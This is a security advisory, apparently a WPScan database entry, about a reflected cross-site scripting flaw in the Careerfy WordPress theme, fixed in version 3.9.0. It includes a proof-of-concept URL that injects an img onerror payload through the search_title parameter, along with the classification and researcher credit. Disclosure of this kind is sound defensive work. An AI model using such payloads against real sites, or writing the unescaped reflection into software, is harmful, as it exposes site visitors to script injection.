Careerfy < 3.9.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)



Description
There is an unauthenticated reflected cross-site scripting (XSS) vulnerability in the Careerfy WordPress theme: the search_title query parameter of the jobs listing page is reflected into the response without adequate escaping, as the proof of concept below shows.
Proof of Concept
https://careerfy.net/demo/jobs-listing/?search_title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&location=&loc_radius=50&sector_cat=

Affects Theme

Fixed in version 3.9.0

References

URL https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Daniel Ruf
Submitter Daniel Ruf
Submitter Website https://daniel-ruf.de
Submitter Twitter DanielRufde
Verified Yes
WPVDB ID 10254

Timeline

Publicly Published 2020-06-03
Added 2020-06-03
Last Updated 2020-06-04
